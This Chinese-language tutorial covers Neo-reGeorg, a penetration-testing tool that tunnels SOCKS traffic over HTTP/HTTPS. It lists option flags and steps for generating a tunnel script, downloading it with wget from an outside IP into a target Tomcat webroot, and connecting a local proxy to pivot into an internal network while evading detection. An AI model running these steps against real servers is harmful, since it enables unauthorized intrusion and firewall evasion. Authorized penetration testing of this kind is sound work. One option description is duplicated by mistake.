Neo-reGeorg

一、Neo-reGeorg简介

Neo-reGeorg 是一个基于 reGeorg 的改进工具，主要用于通过 HTTP/HTTPS 协议建立 SOCKS 代理隧道，帮助渗透测试人员绕过防火墙限制，访问内网资源。

主要功能

1. SOCKS 代理：通过 HTTP/HTTPS 创建 SOCKS5 代理隧道，支持多平台。
2. 隐蔽性：流量伪装成正常 HTTP/HTTPS 请求，避免被检测。
3. 多语言支持：提供 PHP、JSP、ASPX 等多种语言的隧道脚本。
4. 加密传输：支持 AES 加密，提升数据传输安全性。
5. 多用户支持：允许多个用户同时使用同一隧道。

选项参数介绍

python neoreg.py -h

可选参数:
  -h, - -help                    显示此帮助消息并退出
  -u URI, --url URI             包含隧道脚本的URL
  -r URL, --redirect-url URL    转发到指定服务器的内网地址（仅适用于 jsp (x)）
  -R, --force-redirect          强制转发（仅适用于 jsp -r ）
  -t IP:PORT, --target IP:PORT  网络转发目标，设置此参数后将启用端口转发
  -k KEY, --key KEY             指定连接密钥
  -l IP, --listen-on IP         默认的监听地址。（默认：127.0.0.1）
  -p PORT, --listen-port PORT      默认的监听端口。（默认：1080）
  -s, --skip                    跳过可用性测试
  -H LINE, --header LINE          将自定义header LINE传递给服务器
  -c LINE, --cookie LINE         自定义初始化Cookie
  -x LINE, --proxy LINE         proto://host[:port]在给定端口上使用代理
  --php-connect-timeout S       PHP 连接超时时间（默认为：0.5）
  --local-dns                   本地读取缓冲区，每个POST发送的最大数据量（默认值：2048 最大：2600）
  --read-buff Bytes             本地读取缓冲区，每个POST发送的最大数据量（默认值：2048 最大：2600）
  --read-interval MS            读取数据间隔，以毫秒为单位。（默认值：100）
  --max-threads N               代理最大线程数（默认值：1000）
  --max-retry N                 代理最大重试次数（默认为：10）
  --cut-left N                  截断响应体的左侧部分
  --cut-right N                 截断响应体的右侧部分
  --extract EXPR                手动提取响应体（例如：<html><p>NEOREGBODY</p></html>）
  -v                            提高详细程度（使用-vv或更多以获得更好的效果）

二、Neo-reGeorg使用

直接访问浏览器或者WEBshell数据是通过HTTP或者HTTPS，可以被轻易的识别
如果挂上了代理，数据将是socks加密，无法轻易的被识别

1.设置密码生成 tunnel.(aspx、ashx、jsp、jspx、php) 并上传到WEB服务器

python neoreg.py generate -k passwd

2.下载 tunnel 脚本到目标WEB服务

wget http://120.79.150.243:8000/tunnel.jsp -O /usr/local/tomcat/webapps/ROOT/tunnel.jsp

3.使用 neoreg.py 连接WEB服务器，在本地建立 socks 代理，代理默认端口 1080

python neoreg.py -k passwd -u http://x.x.x.x:38080/tunnel.jsp

4.测试代理是否开启

proxychains curl 127.0.0.1:8080